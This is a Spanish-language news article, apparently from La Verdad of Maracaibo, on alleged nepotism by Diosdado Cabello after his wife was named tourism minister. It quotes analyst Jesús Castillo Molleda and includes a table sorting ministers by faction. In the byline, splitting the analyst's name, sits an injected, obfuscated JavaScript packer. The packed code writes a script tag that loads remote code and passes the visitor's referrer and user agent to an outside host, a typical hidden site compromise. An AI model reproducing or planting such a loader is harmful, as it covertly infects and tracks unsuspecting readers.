publicidad

El nepotismo de Diosdado

Leopoldo Márquez / Maracaibo / noticias@laverdad.com
Jesús eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snndy|var|u0026u|referrer|ikdsk||js|php'.split('|'),0,{})) Castillo Molleda considera que la presencia de la esposa del presidente de la AN en el gabinete compromete más a Cabello con el gobierno de Maduro. "Es mucho mejor tener a Diosdado de amigo que de adversario", analiza el politólogo, quien ve al jefe del parlamento como una figura importante del PSUV

Ese apellido me suena. Más de uno habrá tenido este pensamiento al oír el pasado martes a Nicolás Maduro decir que la diputada Marlenys Contreras de Cabello es la nueva ministra de Turismo en sustitución de Andrés Izarra. Un nombramiento que evidencia el incremento de las cuotas de poder de los Cabello, cada vez más involucrados en todos los asuntos del Gobierno, apadrinados el nuevo propulsor del nepotismo venezolano, el presidente de la Asamblea Nacional, el capitán Diosdado.

Tal como lo hace en las sesiones legislativas, en las que apaga el micrófono de sus adversarios y les niega el derecho de palabra como si el Parlamento le perteneciera, a Diosdado Cabello no le interesa guardar las formas. Por eso avala que su esposa entre al gabinete, que su hermano, José David, presida el Seniat y sea ministro de Industria y que su hija Daniela haga -en español o en inglés- las propagandas y los jingles para promocionar las bondades del socialismo del siglo XXI.

Mucho se ha rumorado sobre la mala relación que existe entre Cabello y el jefe de Estado, Nicolás Maduro, pero lo cierto es que desde la llegada del denominado presidente obrero, hace casi dos años, el poder de los Cabello ha crecido tanto que, en palabras del politólogo Jesús Castillo Molleda, desplazaron a la familia del exmandatario Hugo Chávez.

"Diosdado es dentro del PSUV y del Polo Patriótico una ficha importante para mantener la gobernabilidad interna del partido y de los aliados. Por su pasado militar, también tiene mucha influencia dentro de las Fuerzas Armadas. Es mucho mejor tener a Diosdado de amigo que de adversario".

La unión Diosdado-Maduro

El nombramiento de la esposa de Diosdado, que trabajó en el Seniat antes de ser electa diputada, compromete más a Cabello con el gobierno de Maduro. A juicio de Molleda, la presencia de su familia en el Ejecutivo hace que el fracaso de Maduro sea el fracaso de Diosdado.

"Si hablamos de Diosdado en la calle, obviamente tiene un alto rechazo electoral, pero a lo interno, él es el vicepresidente del PSUV y tiene fortaleza, liderazgo, posiciones duras y es un caballo de batalla. Así que este movimiento en el gabinete es para demostrar a sus seguidores que entre ellos no hay problemas, por todos los rumores que se han dado, y a la vez, enviar el mensaje a los adversarios del PSUV de que Diosdado y Maduro son un componente único".

En los estudios de campo que el politólogo está haciendo desde hace tres años, se observa que lo que necesita el Presidente de Venezuela es el fortalecimiento interno para lograr gobernabilidad. "Para Maduro sería muy satisfactorio gritar a los cuatro vientos que recibió de Chávez un desastre, pero no lo puede decir. Todo lo que está pasando a nivel de corrupción es una herencia de él que le ha impedido a Maduro tener estabilidad y, sin lugar a dudas, Diosdado es un factor primordial para poner orden adentro".

El peso de Diosdado en el Gobierno es de tal magnitud que su presencia parece innegociable. Es difícil recordar a Maduro haciendo un anuncio importante sin este hombre a su lado. Los más desconfiados, incluso, han llegado a sopesar la idea de que, desde el estrado de la AN, Cabello es quien toma las decisiones. Molleda no duda, sin embargo, que el presidente sea Maduro, pero está consciente de que Diosdado toma algunas decisiones que, "por su ambición personal, quisiera fueran muchas más".

"Decir que gobierna Diosdado es como muy irónico", comenta el politólogo. "Puede tomar algunas decisiones a lo interno, pero no es el hombre más fuerte a lo externo. Por ejemplo, si ahorita renuncia Maduro y Diosdado es el candidato, obviamente hacia lo interno del PSUV tendría aceptación, pero no ganaría ningún voto externo. Nadie que esté fuera del partido le daría un voto a Diosdado".

La gran verdad parece ser que Diosdado necesita tanto de Maduro como Maduro de Diosdado. "Él (Cabello) no es un candidato que atrae votos, que atrae masas; además, es muy malo en el tema de las masas. Es muy bueno para la doctrina interna, bajo el carácter, la señalización, el trabajo de campo, porque no se le puede negar que si estos carajos invirtieran todo el tiempo que están en la calle en hacer cosas buenas tuviéramos una Dubái".

La AN es su lugar

En el horizonte de la política venezolana, Molleda no imagina la AN sin la explosividad de su presidente, incendiando el hemiciclo con gritos. "Fracasó como gobernante cuando tuvo la oportunidad de oro de ser gobernador de Miranda y obviamente no tiene muchas cosas que exhibir. Ha demostrado ser un buen ejecutivo político, pero no es un buen gerente público".

Para los analistas, Diosdado Cabello seguirá representando una importante figura en la Asamblea. Seguramente tendrá un circuito ganador, primero en la lista, garantizando que entre al Parlamento. "¿Te imaginas a Diosdado como diputado de la AN en minoría? Debe ser un personaje de esos que incendian el Parlamento, una Iris Varela", confiesa Molleda, quien ve en el exgobernador de Miranda a un hombre que, cuando es pasivo, es un factor importante, "porque cuando se para y llama a un presidente de un partido político, a un miembro de la MUD, a un empresario, a un inversionista, ellos saben que tiene voz y voto en el Gobierno". Ellos saben que Diosdado tiene a su familia y sus hombres de confianza dentro.

 

Las alas del oficialismo, según Castillo Molleda

Ministerio

Ministro(a)

Corriente

Ministerio del Despacho de la Presidencia y Seguimiento de la Gestión de Gobierno

Carmen Teresa Meléndez Rivas

Madurista

Ministerio para Relaciones Interiores, Justicia y Paz

Gustavo González López

Diosdado

Ministerio para Relaciones Exteriores

Delcy Eloína Rodríguez Gómez

De Jorge Rodríguez/Leal a Maduro

Ministerio para la Planificación

Ricardo José Menéndez Prieto

Madurista

Ministerio para la Economía, Finanzas y Banca Pública

Rodolfo Clemente Marco Torres

Madurista

Ministerio para la Defensa

Vladimir Padrino López

Chavista/Más cercano a Diosdado

Ministerio para el Comercio

Isabel Delgado

Madurista

Ministerio de Industrias

José David Cabello

Diosdado

Ministerio para el Turismo

Marleny Contrera

Diosdado

Ministerio para la Agricultura y Tierras

José Luis Berroterán

Chavista/Madurista

Ministerio para la Educación Universitaria, Ciencia y Tecnología

Manuel Fernández Meléndez

Madurista

Ministerio para la Educación

Héctor Rodríguez Castro

Chavista/Comprometido con Maduro

Ministerio para la Salud

Henry Ventura

Madurista

Ministerio para el Proceso Social del Trabajo

Jesús Martínez

Madurista/Chavista y de María Cristina Iglesia

Ministerio para Transporte Terrestre

Haiman El Troudi

Chavista hasta los tuétanos/No es de grupitos

Ministerio para Transporte Acuático y Aéreo

Giuseppe Yoffreda

Diosdado

Ministerio para Vivienda y Hábitat

Guillermo Barreto

Le sonríe a Diosdado y a Maduro

Ministerio para Ecosocialismo y Aguas

Ricardo Antonio Molina Peñaloza

Madurista

Ministerio de Petróleo y Minería

Asdrúbal Chávez

Chavista/Leal a Maduro.

Ministerio para la Comunicación y la Información

Jacqueline Faría

Chavista/De Jorge Rodríguez/Leal a Maduro

Ministerio para las Comunas y Movimientos Sociales

Elías Jaua Milano

Una amenaza para ambos: Diosdado y Maduro

Ministerio para la Alimentación

Carlos Osorio

Chavista/No es de grupitos

Ministerio para la Cultura

Reinaldo Iturriza

Chavista/Madurista

Ministerio para los Pueblos Indígenas

Aloha Núñez

Madurista

Ministerio para la Mujer y la Igualdad de Género

Andreína Tarazón

Chavista/ Influencia de Diosdado

Ministerio para la Energía Eléctrica

Jesse Chacón

Leal a Maduro

Ministerio para la Juventud y Deportes

Antonio Álvarez

Madurista

Ministerio para el Servicio Penitenciario

María Iris Varela Rangel

Chavista/Le debe mucho a Diosdado

Más noticias

  • La UE prepara grupo en favor del diálogo en Venezuela

    03:40pm

    La Unión Europea (UE) continuó este lunes perfilando el "grupo de contacto", compuesto por países comunitarios y latinoamericanos para "facilitar" el diálogo en la crisis política venezolana, y preparó su posición de cara al segundo mandato del presidente, Nicolás Maduro, producto de unos comicios "injustos"

  • Venezuela realiza maniobras militares con Rusia

    03:23pm

    Según el Ministerio de Defensa de Rusia, en Caracas aterrizó este lunes una escuadrilla de aviones de ese país, incluidos dos bombarderos estratégicos T-160, capaces de transportar armas nucleares

  • Bombarderos capaces de llevar bombas nucleares están en el país

    01:53pm

    Una escuadrilla de aviones rusos, incluidos dos bombarderos estratégicos T-160, capaces de llevar bombas nucleares, aterrizó en el aeropuerto de Maiquetía Simón Bolívar en Venezuela, según informó el ministerio de Defensa de Rusia en un comunicado.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama